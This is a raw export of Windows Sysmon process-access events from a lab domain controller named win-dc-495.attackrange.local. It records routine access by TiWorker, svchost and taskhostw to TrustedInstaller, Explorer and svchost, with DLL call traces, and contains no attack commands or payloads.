13:58:31.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.180{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 